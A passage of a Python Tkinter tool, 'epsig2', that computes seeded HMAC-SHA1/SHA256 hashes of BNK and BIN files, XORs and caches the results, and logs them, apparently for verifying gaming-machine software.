# Check if Seed and Algorithm matches.
if item['seed'] == seed_input and item['alg'] == alg_input:
# verified_time = item['verify']
return(str(item['hash'])) # return Hash result
return None
def checkCacheFilename_BNK(self, filename, seed_input, alg_input): # alg_input
# For filename_seed, concatenate to form unique string.
if filename in self.cache_dict.keys(): # a hit?
data = self.cache_dict.get(filename) # now a list
# print(json.dumps(data, indent=4, sort_keys=True))
for item in data:
# Check if Seed and Algorithm matches.
if item['seed'] == seed_input and item['alg'] == alg_input:
# verified_time = item['verify']
return(str(item['hash'])) # return Hash result
return None
# input: file to be CRC32
def dohash_crc32(self, fname):
buf = open(fname,'rb').read()
buf = (binascii.crc32(buf) & 0xFFFFFFFF)
return "%08X" % buf
# input: file to be hashed using sha256()
# output: hexdigest of input file
def dohash_sha256(self, fname, chunksize=8192):
m = hashlib.sha256()
# Read in chunksize blocks at a time
with open(fname, 'rb') as f:
while True:
block = f.read(chunksize)
if not block: break
m.update(block)
return m.hexdigest()
# input: file to be hashed using hmac-sha1
# output: hexdigest of input file
def dohash_hmacsha(self, fname, chunksize, hash_type):
# time.sleep(1)
# change this if you want other hashing types for HMAC, e.g. hashlib.md5
key = bytes.fromhex(self.seed)
m = None
if hash_type == 'HMAC-SHA1':
m = hmac.new(key, digestmod = hashlib.sha1)
elif hash_type == 'HMAC-SHA256':
m = hmac.new(key, digestmod = hashlib.sha256)
else:
logging.error("unknown hash type: " + hash_type)
sys.exit(1)
done = 0
size = os.path.getsize(fname)
# Read in chunksize blocks at a time
with open(fname, 'rb') as f:
while True:
# time.sleep(1)
block = f.read(chunksize)
done += chunksize
sys.stdout.write("%7d"%(done*100/size) + "%" + p_reset)
if not block: break
m.update(block)
return m.hexdigest()
def checkhexchars(self, text):
return (all(c in string.hexdigits for c in text))
def dobin(self, fname, blocksize):
#time.sleep(1)
oh = "0000000000000000000000000000000000000000000000000000000000000000"
if self.options_d['cache_file_f'] == True: # Use Cache File
# Overwrite self.cache_dict with contents of file
cache_file = CacheFile(self.user_cache_file)
self.cache_dict = cache_file.cache_dict
if (len(self.seed) < 2 or not self.checkhexchars(self.seed)):
messagebox.showerror("Error in Seed Input",
"Expected atleast two Hexadecimal characters as the Seed input" +
".\n\nCheck your Seed string again: " + self.seed)
return -1
else:
logging.debug("Processing: " + fname + "\t[" + str(threading.currentThread().getName()) + "]")
try:
hash_type = self.selectedHashtype # this is HMAC-SHA1 or HMAC-SHA256
if (os.path.isfile(fname)):
# The following should return a list
cachedhit = self.checkCacheFilename(fname, self.seed, hash_type) # TODO: for BIN FILES?
# logging.debug("%-50s\tSEED" % (self.format_output(self.seed, self.options_d)))
if cachedhit:
localhash = cachedhit
else: # append to cachelist
new_cache_list = list()
localhash = self.dohash_hmacsha(fname, blocksize, self.selectedHashtype)
seed_info = {
'seed': self.seed,
'alg': hash_type,
'hash': localhash
}
cache_entry_list = self.cache_dict.get(fname) # Should return a list.
if cache_entry_list : # File Entry Exists, append to list
cache_entry_list.append(seed_info) # print this
self.cache_dict[fname] = cache_entry_list # keep unique
else: # No File Entry Exits generate new list entry in cache_dict
new_cache_list.append(seed_info)
self.cache_dict[fname] = new_cache_list # keep unique
# if self.useCacheFile.get() == 1:
if self.options_d['cache_file_f'] == True:
# self.updateCacheFile(self.cache_dict) # Update file cache
cache_file.updateCacheFile(self.cache_dict) # Update file cache
else:
self.cache_dict[fname] = new_cache_list # update local cache
# Append Object to Log object
self.LogOutput.append({'filename': os.path.basename(fname),
'filepath': self.mandir + "/" ,
'seed' : self.seed,
'alg': hash_type,
'hash': localhash})
oh = hex(int(oh,16) ^ int(str(localhash), 16)) # XOR result
if cachedhit:
outputstr = "%-50s\t%-s\t%-10s" % (self.format_output(str(localhash),
self.options_d), os.path.basename(fname), "(cached)")
else:
outputstr = "%-50s\t%-s\t" % (self.format_output(str(localhash), self.options_d),
os.path.basename(fname))
logging.debug(outputstr + "[" + str(threading.currentThread().getName()) + "]")
else:
logging.error("\n!!!!!!!!!!!!!! ERROR: Could not read file: " + fname)
except KeyboardInterrupt:
logging.debug("Keyboard interrupt during processing of files. Exiting")
sys.exit(1)
return oh # { 'oh': oh, 'cache_dict' : self.cache_dict, 'rv': self.LogOutput ,'filename' : fname}
# limitations: currently only supports bnk file with SHA1 contents
def dobnk(self, fname, blocksize):
#time.sleep(1)
cache_file = None
outputstr = None
if self.options_d['cache_file_f'] == True: # Use Cache File
# Overwrite self.cache_dict with contents of file
cache_file = CacheFile(self.user_cache_file)
self.cache_dict = cache_file.cache_dict
oh = "0000000000000000000000000000000000000000" # 40 chars
# Verify Seed is a number String format, and atleast 2 digits long
if (len(self.seed) < 2 or not epsig2.checkhexchars(self, self.seed)):
messagebox.showerror("Error in Seed Input",
"Expected atleast two Hexadecimal characters as the Seed input" +
".\n\nCheck your Seed string again: " + self.seed)
return -1
else:
try:
logging.debug("Processing: " + fname + "\t[" + str(threading.currentThread().getName()) + "]")
with open(fname, 'r') as infile:
fdname = ['fname', 'type', 'blah']
reader = csv.DictReader(infile, delimiter=' ', fieldnames = fdname)
# logging.debug("%-50s\tSEED" % (self.format_output(self.seed, self.options_d)))
#futures = list()
#pool = ThreadPoolExecutor(5) # 5 threads max
for row in reader:
if str(row['type']).upper() == 'SHA1' or str(row['type']).upper() == 'SHA256':
# check if the file exists
fp = self.mandir + "/" + str(row['fname']) # can't use: os.path.join(self.mandir, str(row['fname'])), as the Cache expects "/"
if (os.path.isfile(fp)):
# The following should return a string if matches or None
cachedhit = epsig2.checkCacheFilename_BNK(self, fp, self.seed, str(row['type']).upper())
if cachedhit != None:
# logging.debug("Cached hit!: " + cachedhit)
localhash = cachedhit
else:
new_cache_list = list()
localhash = epsig2.dohash_hmacsha(self, self.mandir + "/" \
+ str(row['fname']), blocksize, 'HMAC-' \
+ str(row['type']).upper()) # BLNK only supports HMAC-SHA1 or HMAC-SHA256
#fp = self.mandir + "/" + str(row['fname'])
#futures.append(pool.submit(self.dohash_hmacsha, fp, blocksize, self.selectedHashtype)) # add processs to threadpool
#for x in as_completed(futures):
# localhash = x.result()
# generate dict for new Filename entry
seed_info = {
'seed': self.seed,
'alg': row['type'].upper(),
'hash': localhash
}
cache_entry_list = self.cache_dict.get(self.mandir + "/" +
str(row['fname'])) # Should return a list.
if cache_entry_list : # File Entry Exists, append to list
cache_entry_list.append(seed_info) # print this
self.cache_dict[self.mandir + "/"
+ str(row['fname'])] = cache_entry_list # keep unique
else: # No File Entry Exits generate new list entry in cache_dict
new_cache_list.append(seed_info)
self.cache_dict[self.mandir + "/" +
str(row['fname'])] = new_cache_list # keep unique
# if self.useCacheFile.get() == 1:
if self.options_d['cache_file_f'] == True:
# self.updateCacheFile(self.cache_dict) # Update file cache
cache_file.updateCacheFile(self.cache_dict) # Update file cache
else:
self.cache_dict[self.mandir + "/" +
str(row['fname'])] = new_cache_list # update local cache
# Append Object to Log object
self.LogOutput.append({'filename': str(row['fname']),
'filepath': self.mandir + "/" ,
'seed' : self.seed,
'alg': row['type'].upper(),
'hash': localhash})
# handle incorrect seed length
if localhash == 0:
break # exit out cleanly
# change to string to Hexadecimal - int(str,16), then XOR result
oh = hex(int(oh,16) ^ int(str(localhash), 16)) # XOR'ed result
if cachedhit:
outputstr = "%-50s\t%-s\t%-10s" % (epsig2.format_output(self, str(localhash),
self.options_d), str(row['fname']), "(cached)")
else:
outputstr = "%-50s\t%-s" % (epsig2.format_output(self, str(localhash), self.options_d),
str(row['fname']))
logging.debug(outputstr + "[" + str(threading.currentThread().getName()) + "]")
# self.outxput.append(outputstr)
else:
error_text = "\n!!!!!!!!!!!!!! ERROR: Could not read file: " + str(row['fname']) + " in: " + fname + "\n\n"
logging.error("Could not read file: " + str(row['fname']) + " in: " + fname)
return -1
# self.output.append(error_text)
else:
messagebox.showerror("Not Yet Implemented!", "Unsupported hash algorithm: " + row['type'].upper() + ".\n\nExiting. Sorry!")
logging.error('Unsupported hash algorithm: ' + row['type'])
return -1
# Need to implement CR16, CR32, PS32, PS16, OA4F and OA4R, and SHA256 if need be.
except KeyboardInterrupt:
logging.debug("Keyboard interrupt during processing of files. Exiting")
#sys.exit(1)
return -1
except FileNotFoundError:
logging.error("Could not read file: " + fname)
return oh # { 'oh': oh } , 'cache_dict' : self.cache_dict, 'rv': self.LogOutput ,'filename' : fname}
# Inserts spaces on [text] for every [s_range]
def insert_spaces(self, text, s_range):
return " ".join(text[i:i+s_range] for i in range(0, len(text), s_range))
# Formats inputstr based on options_d dictionary
def format_output(self, inputstr, options_d):
outputstr = ''
if options_d['selectedHashtype'] == 'HMAC-SHA1':
outputstr = inputstr.lstrip('0X').lstrip('0x').zfill(40) #strip 0x first
elif options_d['selectedHashtype'] == 'HMAC-SHA256':
outputstr = inputstr.lstrip('0X').lstrip('0x').zfill(64) #strip 0x first
# include a space for every eight chars
if (options_d['eightchar'] == True):
s_range = 8
outputstr = " ".join(outputstr[i:i+s_range] for i in range(0, len(outputstr), s_range)) # self.insert_spaces(inputstr, 8)
# uppercase
if options_d['uppercase'] == True:
outputstr = outputstr.upper()
# QCAS expected result
if options_d['reverse'] == True:
outputstr = epsig2.getQCAS_Expected_output(self, outputstr)
return outputstr
def getQCAS_Expected_output(self, text):
tmpstr = text[:8] # Returns from the beginning to position 8 of uppercase text
return "".join(reversed([tmpstr[i:i+2] for i in range(0, len(tmpstr), 2)]))
def processfile(self,chunks=8192):
# time.sleep(1)
fname=self.filepath
h = None
do_output = None
if fname:
future = list()
if fname.upper().endswith(".BNK"):
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future.append(executor.submit(self.dobnk, fname, chunks))
# h = self.dobnk(fname, chunks)
#elif fname.upper().endswith(".BIN"):
else:
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future.append(executor.submit(self.dobin, fname, chunks))
# h = self.dobin(fname, chunks)
#else:
# logging.error("unknown file type selected: " + fname)
# messagebox.showerror("Invalid files selected", "Please select either .BNK or .BIN files only")
# return
for x in as_completed(future):
# time.sleep(1)
h = x.result()
if h == -1:
return # handle error in seed input
else:
# self.text_BNKoutput.insert(END, "%-50s\t%s\n" % (str(h).zfill(40), "RAW output"))
# raw_outputstr = "%-50s\t%s" % (str(h).zfill(40), "RAW output")
# logging.debug(raw_outputstr + "\t[" + str(threading.currentThread().getName()) + "]")
# self.output.append(raw_outputstr)
####
# processfile must occur before any reads to self.xor_result!!
self.xor_result = h
####
outputstr = "%-50s" % (str(self.format_output(str(h), self.options_d)))
if fname.upper().endswith(".BNK"):
logging.debug(outputstr + "\tXOR Formatted Result" + "\t [" + str(threading.currentThread().getName()) + "]")
else:
logging.debug(outputstr + "\tFormatted Result" + "\t [" + str(threading.currentThread().getName()) + "]")
class Seed():
def __init__(self, seed, hash_type):
self.hash_type = hash_type
valid_hash_types = ['HMAC-SHA256', 'HMAC-SHA1']
if hash_type in valid_hash_types:
self.seed = self.getSeed(seed)
logging.warning("Seed Modifed to: " + self.seed)
else:
self.seed = None
return -1
def getSeed(self, s):
output_str = ''
# need to append '0' to include appropriate length
if self.hash_type == 'HMAC-SHA256' and len(s) < 64:
# append
output_str = s.ljust(64, '0')
elif self.hash_type == 'HMAC-SHA1' and len(s) < 40:
output_str = s.ljust(40, '0')
elif self.hash_type == 'HMAC-SHA256' and len(s) > 64:
# truncate
output_str = s[:64]
elif self.hash_type == 'HMAC-SHA1' and len(s) > 40:
output_str = s[:40]
else:
return s
return output_str
class epsig2_gui(threading.Thread):
# Constructor
def __init__(self):
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
logging.debug('Start of epsig2_gui')
self.bnk_filename = ''
self.filepath = ''
self.seed_filepath = ''
self.bnk_filename_list = list()
self.filelist = list()
self.user_cache_file = None
self.cache_dict = {} # Clear cache_dict
self.root = Tk()
self.selectedHashtype = StringVar()
self.seed = None
Thread(self.setupGUI()).start()
def writetoLogfile(self, filename, epsig2_p, bnkfile, multi_logf):
timestamp = datetime.timestamp(datetime.now())
outputfile = ''
#if self.logtimestamp.get() == 1: # Multi log files not overwritten saved in different directory
if multi_logf == True:
outputfile = "epsig2-logs/" + filename[:-4] + "-" + str(timestamp) + ".log"
else: # Single log file that's overwritten
outputfile = filename
with open(outputfile, 'a+') as outfile:
outfile.writelines("#--8<-----------GENERATED: " +
str(datetime.fromtimestamp(timestamp)) + " --------------------------\n")
outfile.writelines("Processsed: " + bnkfile + "\n")
# outfile.writelines("%40s \t %40s \t %60s\n" % ("SEED", "HASH", "FILENAME"))
my_seed = ''
outfile.writelines("%-40s \t %-40s \t %-60s\n" % ("Seed", "Hash", "Filename"))
for item in epsig2_p.LogOutput:
outfile.writelines("%40s \t %40s \t %-60s\n" % (epsig2.format_output(self, str(item['seed']), self.gui_getOptions()),
epsig2.format_output(self, str(item['hash']), self.gui_getOptions()), item['filename']))
my_seed = str(item['seed'])
if epsig2_p.filepath.upper().endswith('.BNK'):
outfile.writelines("%40s \t %40s \t XOR\n" % (epsig2.format_output(self, my_seed, self.gui_getOptions()),
epsig2.format_output(self, epsig2_p.xor_result.replace(" ", ""), self.gui_getOptions())))
else:
outfile.writelines("%40s \t %40s \t Formatted Output\n" % (epsig2.format_output(self, my_seed, self.gui_getOptions()),
epsig2.format_output(self, epsig2_p.xor_result.replace(" ", ""), self.gui_getOptions())))
# Returns flipped bits of full length
def getClubsQSIM_Expected_output(self, text):
return "".join(reversed([text[i:i+2] for i in range(0, len(text), 2)]))
# Generates the Seed object everytime the "start" button is pressed.
def GetSeedText(self):
tmp_seed = ''
# reverse the seed.
if (self.reverse.get() == 1):
tmp_seed = epsig2.getQCAS_Expected_output(self, self.combobox_SelectSeed.get())
else:
tmp_seed = self.combobox_SelectSeed.get()
self.seed = Seed(tmp_seed, self.selectedHashtype.get())
logging.warning("Seed Modifed to: " + self.seed.seed)
def gui_getOptions(self):
options_d = dict()
options_d['cache_file_f'] = self.useCacheFile.get() == 1
options_d['uppercase'] = self.uppercase.get() == 1
options_d['eightchar'] = self.eightchar.get() == 1
options_d['reverse'] = self.reverse.get() == 1
options_d['usr_cache_file'] = self.CacheFileButtonText.get()
options_d['selectedHashtype'] = self.selectedHashtype.get()
return options_d
# refer: https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression
def merge_two_dicts(self, x, y):
z = x.copy() # start with x's keys and values
z.update(y) # modifies z with y's keys and values & returns None
return z
def updateGUI(self, epsig2_process):
# update main text area window
# def format_output(self, inputstr, options_d):
if epsig2_process.filepath:
if epsig2_process.filepath.upper().endswith('.BNK'):
# Display Filename to be processed
self.text_BNKoutput.insert(END, "\nProcessing: " + epsig2_process.filepath + "\n")
# Display BNK details
for hash_result in epsig2_process.LogOutput:
# bnk_details_hash_output = hash_result['seed'] + "\t" + hash_result['hash'] + "\t" + hash_result['filename']
seed_str = epsig2.format_output(self, hash_result['seed'], self.gui_getOptions())
hash_str = epsig2.format_output(self, hash_result['hash'], self.gui_getOptions())
bnk_details_hash_output = seed_str + "\t" + hash_str + "\t" + hash_result['filename']
self.text_BNKoutput.insert(END, bnk_details_hash_output + "\n")
self.text_BNKoutput.insert(END, "XOR Result: " + "\n")
else:
self.text_BNKoutput.insert(END, "Formatted Result: " + "\n")
else:
self.text_BNKoutput.insert(END, "Invalid file - error in file/filename format.\n")
# Format seed and XOR/Formatted Result
seed_output = epsig2.format_output(self, self.seed.seed, self.gui_getOptions())
str_output = epsig2.format_output(self, epsig2_process.xor_result, self.gui_getOptions())
if epsig2_process.filepath:
self.text_BNKoutput.insert(END, seed_output + "\t" + str_output + "\t" + os.path.basename(epsig2_process.filepath + "\n"))
def startEpsig2GUI(self, filepath):
#futures = list()
#pool = ThreadPoolExecutor(len(self.filelist)) # one thread per file
self.bnk_filename = os.path.basename(filepath)
self.mandir = os.path.dirname(filepath)
self.GetSeedText()
if (self.clubs_expected_output.get() == 1):
message = "\nQSIM reversed seed to use: " + self.getClubsQSIM_Expected_output(self.seed.seed) + "\n"
logging.info(message)
self.text_BNKoutput.insert(END, message)
logging.info("Seed is: " + self.seed.seed + " length is: " + str(len(self.seed.seed)))
# create process for hashing a file
my_p = epsig2(self.seed.seed, filepath, self.gui_getOptions(), self.cache_dict, str(self.selectedHashtype.get()))
#futures.append(pool.submit(my_p.processfile, filepath, MAXIMUM_BLOCKSIZE_TO_READ)) # add processs to threadpool
my_p.processfile()
# update dict()
self.cache_dict = self.merge_two_dicts(self.cache_dict, my_p.cache_dict)
self.updateGUI(my_p)
# def writetoLogfile(self, filename, xor_result, bnkfile, multi_logf):
if self.writetolog.get() == 1 and my_p.filepath:
self.writetoLogfile(EPSIG_LOGFILE, my_p, filepath, self.logtimestamp.get() == 1)
# Create and launch a thread
# t = Thread(group=None, target=my_p.processfile, name=self.bnk_filename, args=(filepath, MAXIMUM_BLOCKSIZE_TO_READ, ))
# t.start()
# xor_result = self.processfile(filepath, MAXIMUM_BLOCKSIZE_TO_READ)
def handleButtonPress(self, myButtonPress):
if myButtonPress == '__selected_bnk_file__':
if (os.name == 'nt'): # Windows OS
tmp = filedialog.askopenfilenames(initialdir='G:/OLGR-TECHSERV/BINIMAGE')
elif (os.name == 'posix'): # Linux OS
tmp = filedialog.askopenfilenames(initialdir='.')
else:
tmp = filedialog.askopenfilenames(initialdir='.')
if tmp:
self.textfield_SelectedBNK.delete(0, END)
self.filelist = tmp
for fname in self.filelist:
fname_basename = os.path.basename(fname)
self.bnk_filename_list.append(fname_basename)
self.textfield_SelectedBNK.insert(0, fname_basename + "; ")
if not epsig2.verifyFileExists(self, fname):
msg = "**** ERROR: " + fname + " cannot be read check contents"
self.text_BNKoutput.insert(END, msg)
logging.error(msg)
elif myButtonPress == '__start__':
if len(self.filelist) > 0:
for filepath in self.filelist:
logging.info("Processing: " + filepath)
if (os.path.isfile(filepath)):
self.startEpsig2GUI(filepath)
else:
logging.warning(filepath + " does not exist")
messagebox.showerror(filepath + " does not exist", "Error in file selection")
else:
# try reading the text box if file exits:
tmp_fname = self.textfield_SelectedBNK.get()
if os.path.isfile(tmp_fname):
self.startEpsig2GUI(tmp_fname)
else:
messagebox.showerror("BNK files not selected.", "Please select files first")
logging.error(str(len(self.filelist)))
elif myButtonPress == '__clear_output__':
self.text_BNKoutput.delete(1.0, END)
elif myButtonPress == '__clear__':
self.text_BNKoutput.delete(1.0, END)
self.cb_reverse.deselect()
self.filepath = ''
self.bnk_filename = ''
self.textfield_SelectedBNK.delete(0, END)
self.reverse.set(0)
self.mslcheck.set(0)
self.cb_uppercase.deselect()
self.cb_mslcheck.deselect()
self.uppercase.set(1)
self.eightchar.set(0)
self.cb_eightchar.deselect()
self.writetolog.set(0)
self.logtimestamp.set(0)
self.clubs_expected_output.set(0)
self.label_SeedPath.configure(text=DEFAULT_STR_LBL_SEED_FILE)
self.combobox_SelectSeed.set('0000000000000000000000000000000000000000')
self.combobox_SelectSeed['values'] = ()
self.bnk_filename_list = list()
self.filelist = list()
self.useCacheFile.set(1)
self.CacheFileButtonText.set(DEFAULT_CACHE_FILE)
self.user_cache_file = None
self.selectedHashtype.set("HMAC-SHA1")
elif myButtonPress == '__clear_cache__':
if self.user_cache_file:
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
if self.useCacheFile.get() == 1: # Use Cache File
cache_file = CacheFile(self.user_cache_file) # read cache file
cache_file.clearFile() # clear file cache
self.cache_dict = cache_file.cache_dict # Overwrite self.cache_dict with contents of file
else:
self.cache_dict = {} # empty_cache_data # Clear cache_dict
elif myButtonPress == '__print_cache__':
self.text_BNKoutput.insert(END, "\nCache Entries: ")
if self.useCacheFile.get() == 1: # Use Cache File
cache_file = CacheFile(self.CacheFileButtonText.get())
self.cache_dict = cache_file.cache_dict # Overwrite self.cache_dict with contents of file
message = json.dumps(self.cache_dict, sort_keys=True, indent=4, separators=(',',':'))
self.text_BNKoutput.insert(END, message + "\n")
elif myButtonPress == '__select_cache_file__':
input_cachefile_dir = filedialog.askdirectory(initialdir='.', title='Select Directory to save cache file...')
self.CacheFileButtonText.set(os.path.join(input_cachefile_dir,os.path.basename(DEFAULT_CACHE_FILE)))
self.user_cache_file = self.CacheFileButtonText.get()
elif myButtonPress == '__selected_seed_file__':
if (os.name == 'nt'): # Windows OS
if (self.mslcheck.get() == 1): # Handle MSL file option for QCAS datafiles
tmp = filedialog.askopenfile(initialdir='G:\OLGR-TECHSERV\MISC\BINIMAGE\qcas')
else:
tmp = filedialog.askopenfile(initialdir='S:\cogsp\docs\data_req\download\master') # put S:\ dir here.
elif (os.name == 'posix'): # Linux OS (my dev box)
tmp = filedialog.askopenfile(initialdir='.')
else:
tmp = filedialog.askopenfile(initialdir='.')
if tmp: # Selected something
self.seed_filepath = tmp.name
self.getComboBoxValues(self.seed_filepath)
# Generate Year and Date based on numbers extracted
sl1date = datetime.strptime(self.sl1_year + "/" + self.sl1_month, "%Y/%m")
self.label_SeedPath.configure(text="Seed File: " + sl1date.strftime("(%b %Y)") + ": " + self.seed_filepath)
def processsl1file(self, fname):
seedlist = ()
with open(fname,'r') as sl1file:
sl1entry = csv.reader(sl1file, delimiter=',')
try:
# Select the Columns we want - index starts at 0
included_cols = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
for row in sl1entry:
seedlist = list(row[i] for i in included_cols) # create a list with only the columns we need
self.sl1_year = row[0] # extract year
self.sl1_month = row[1] # extract month
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (fname, sl1file.line_num, e))
return seedlist
def getComboBoxValues(self, fname):
if (os.path.isfile(fname)):
self.combobox_SelectSeed['values'] = self.processsl1file(fname)
else:
messagebox.showerror("Expected SL1 or MSL file to Process", fname + " is not a valid seed file")
def aboutwindow(self):
about_script = "Version: v" + VERSION + " by aceretjr\n Python3 script for processing BNK and BIN files."
messagebox.showinfo("About This Script", about_script)
def SelectHashType(self, value):
self.selectedHashtype.set(value)
def seed_selection(self):
print(self.box_value.get())
def setupGUI(self):
self.root.wm_title("epsig2 BNK/BIN file hashing tool v" + VERSION)
self.root.resizable(1,1)
menubar = tk.Menu(self.root)
filemenu = tk.Menu(menubar, tearoff=0)
#optionmenu = tk.Menu(menubar, tearoff=1)
helpmenu = tk.Menu(menubar, tearoff=0)
menubar.add_cascade(label="File", menu=filemenu)
# menubar.add_cascade(label="Option", menu=optionmenu)
menubar.add_cascade(label="Help", menu=helpmenu)
filemenu.add_command(label="Exit", command=self.root.destroy)
helpmenu.add_command(label="About...", command=self.aboutwindow)
#optionmenu.add_command(label="Preferences...", command=self.MenuBar_Config) # start this script now.
self.root.config(menu=menubar)
######## Top Frame
frame_toparea = ttk.Frame(self.root)
frame_toparea.pack(side = TOP, fill=X, expand=False)
frame_toparea.config(relief = None, borderwidth = 2)
frame_toparea2 = ttk.Frame(frame_toparea)
frame_toparea2.pack(side = TOP, fill=X, expand=False)
frame_toparea2.config(relief = None, borderwidth = 2)
ttk.Label(frame_toparea2, justify=LEFT,
text = 'GUI script to process BNK/BIN files (Supports only HMAC-SHA1/HMAC-SHA256) - Please Select: ').pack(side=LEFT, padx=3, pady=3, fill=Y, expand=False, anchor='w')
self.selectedHashtype = StringVar()
optionMenuHashType = OptionMenu(frame_toparea2, self.selectedHashtype, 'HMAC-SHA1', 'HMAC-SHA256', command=self.SelectHashType).pack(side=LEFT, padx=3, pady=3, fill=X, expand=False, anchor='w')
self.selectedHashtype.set("HMAC-SHA1")
######## BNK Selection Frame
frame_bnkSelectionFrame = ttk.Frame(frame_toparea)
frame_bnkSelectionFrame.config(relief = RIDGE, borderwidth = 2)
frame_bnkSelectionFrame.pack(side = TOP, padx = 3, pady = 3, expand = False, fill=X, anchor = 'w')
button_SelectedBNKfile = ttk.Button(frame_bnkSelectionFrame, text = "Select BNK/BIN file...", width=20,
command = lambda: self.handleButtonPress('__selected_bnk_file__'))
button_SelectedBNKfile.pack(side=LEFT, padx = 3, pady = 3, fill=X, expand=False)
# Text Entry Selected BNK file
self.textfield_SelectedBNK = ttk.Entry(frame_bnkSelectionFrame, width = 120)
self.textfield_SelectedBNK.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=True)
########### Seed Frame Area
frame_SeedFrame = ttk.Frame(frame_toparea)
frame_SeedFrame.config(relief = RIDGE, borderwidth = 2)
frame_SeedFrame.pack(side=TOP, fill=X, padx = 3, pady = 3, expand=True)
frame_SelectSeed = ttk.Frame(frame_toparea)
frame_SelectSeed.config(relief= None, borderwidth = 2)
frame_SelectSeed.pack(side=TOP, fill=X, padx = 3, pady = 3, expand=True)
# Button Selected Seed file (sl1)
button_Selectedsl1file = ttk.Button(frame_SeedFrame,
text = "Seed or SL1/MSL file...", width = 20,
command = lambda: self.handleButtonPress('__selected_seed_file__'))
button_Selectedsl1file.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=False)
# Combo Box for Seeds, default to 0x00
self.box_value = StringVar()
self.combobox_SelectSeed = ttk.Combobox(frame_SeedFrame,
justify=LEFT,
textvariable=self.box_value,
# command=self.seed_selection,
width = 70)
self.combobox_SelectSeed.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=True)
self.combobox_SelectSeed.set('0000000000000000000000000000000000000000')
# Checkbutton MSL file (casinos)
self.mslcheck = IntVar()
self.mslcheck.set(0)
self.cb_mslcheck = Checkbutton(frame_SeedFrame,
text="MSL (Use Casino MSL File)",
justify=LEFT,
variable = self.mslcheck,
onvalue=1,
offvalue=0)
self.cb_mslcheck.pack(side=LEFT, fill=X, padx = 3, pady = 3, expand=False)
# Text Label sl1 location
self.label_SeedPath = ttk.Label(frame_toparea,
text = DEFAULT_STR_LBL_SEED_FILE, width = 80)
self.label_SeedPath.pack(side=BOTTOM, fill=X, padx = 3, pady = 3, expand=True)
######################### MIDDLE FRAME
frame_middleframe = ttk.Frame(self.root)
frame_middleframe.pack(side = TOP, fill=BOTH, expand=True)
# Need to use .pack() for scrollbar and text widget
frame_textarea = ttk.Labelframe(frame_middleframe, text="Output Field")
frame_textarea.pack(side = LEFT, fill=BOTH, expand=True)
frame_textarea.config(relief = RIDGE, borderwidth = 2)
# Text Area output of BNK file generation
self.text_BNKoutput = Text(frame_textarea, height=25, width =80)
myscrollbar = Scrollbar(frame_textarea, command=self.text_BNKoutput.yview)
myscrollbar.pack(side=RIGHT, fill=Y)
self.text_BNKoutput.configure(yscrollcommand=myscrollbar.set)
self.text_BNKoutput.pack(side=LEFT, fill=BOTH, expand=True)
#Frame for Checkbuttons
frame_checkbuttons = ttk.Labelframe(frame_middleframe, text="Output Options")
frame_checkbuttons.pack(side = RIGHT, fill=Y, expand = False)
frame_checkbuttons.config(relief = RIDGE, borderwidth = 2)
# Checkbutton Reverse
self.reverse = IntVar()
self.reverse.set(0)
self.cb_reverse = Checkbutton(
frame_checkbuttons,
text="QCAS expected output",
justify=LEFT,
variable = self.reverse,
onvalue=1,
offvalue=0)
self.cb_reverse.grid(row=1, column=1, sticky='w')
# Checkbutton QSIM expected Seed
self.clubs_expected_output = IntVar()
self.clubs_expected_output.set(0)
self.cb_clubs_expected_output = Checkbutton(
frame_checkbuttons,
text="Display QSIM expected seed",
justify=LEFT,
variable = self.clubs_expected_output,
onvalue=1,
offvalue=0)
self.cb_clubs_expected_output.grid(row=2, column=1, sticky='w')
# Checkbutton Uppercase
self.uppercase = IntVar()
self.uppercase.set(1)
self.cb_uppercase = Checkbutton(
frame_checkbuttons,
text="Uppercase",
justify=LEFT,
variable = self.uppercase,
onvalue=1,
offvalue=0)
self.cb_uppercase.grid(row=3, column=1, sticky='w')
# Checkbutton 8 Char
self.eightchar = IntVar()
self.eightchar.set(0)
self.cb_eightchar = Checkbutton(
frame_checkbuttons,
text="8 character spacing",
justify=LEFT,
variable = self.eightchar,
onvalue=1,
offvalue=0)
self.cb_eightchar.grid(row=4, column=1, sticky='w',)
# Checkbutton Write to Log
self.writetolog = IntVar()
self.writetolog.set(1)
self.cb_writetolog = Checkbutton(
frame_checkbuttons,
text="Log File: epsig2.log",
justify=LEFT,
variable = self.writetolog,
onvalue=1,
offvalue=0)
self.cb_writetolog.grid(row=5, column=1, sticky='w',)
# Timestamp logs
self.logtimestamp = IntVar()
self.logtimestamp.set(0)
self.cb_logtimestamp = Checkbutton(
frame_checkbuttons,
text="Multiple Log Files: epsig2-logs/",
justify=LEFT,
variable = self.logtimestamp,
onvalue=1,
offvalue=0)
self.cb_logtimestamp.grid(row=6, column=1, sticky='w',)
################ Bottom FRAME ##############
frame_bottombuttons = ttk.Frame(self.root)
frame_bottombuttons.pack(side=BOTTOM, fill=X, expand = False)
frame_bottombuttons.config(relief = None, borderwidth = 2)
################ Bottom Control FRAME ##############
frame_controlbuttons = ttk.Frame(frame_bottombuttons)
frame_controlbuttons.pack(side=TOP, fill=X, expand = True)
frame_controlbuttons.config(relief = RIDGE, borderwidth = 2)
# Clear Button
self.button_clear = ttk.Button(
frame_controlbuttons,
text = "Reset Form to Defaults",
command = lambda: self.handleButtonPress('__clear__'),
width = 20)
self.button_clear.grid(row=1, column = 1, padx=5, pady=5, sticky='w',)
# Clear Output
button_clear_output = ttk.Button(
frame_controlbuttons,
text = "Clear Output Field",
command = lambda: self.handleButtonPress('__clear_output__'),
width = 20)
button_clear_output.grid(row=1, column=2, sticky='w', padx=5, pady=5)
# Start Button
self.button_start = ttk.Button(
frame_controlbuttons,
text = "Generate Hash...",
command = lambda: self.handleButtonPress('__start__'),
width = 20)
self.button_start.grid(row=1, column=3, sticky='w', padx=5, pady=5)
################ Bottom Cache FRAME ##############
frame_cachebuttons = ttk.Frame(frame_bottombuttons)
frame_cachebuttons.pack(side=BOTTOM, fill=X, expand = True)
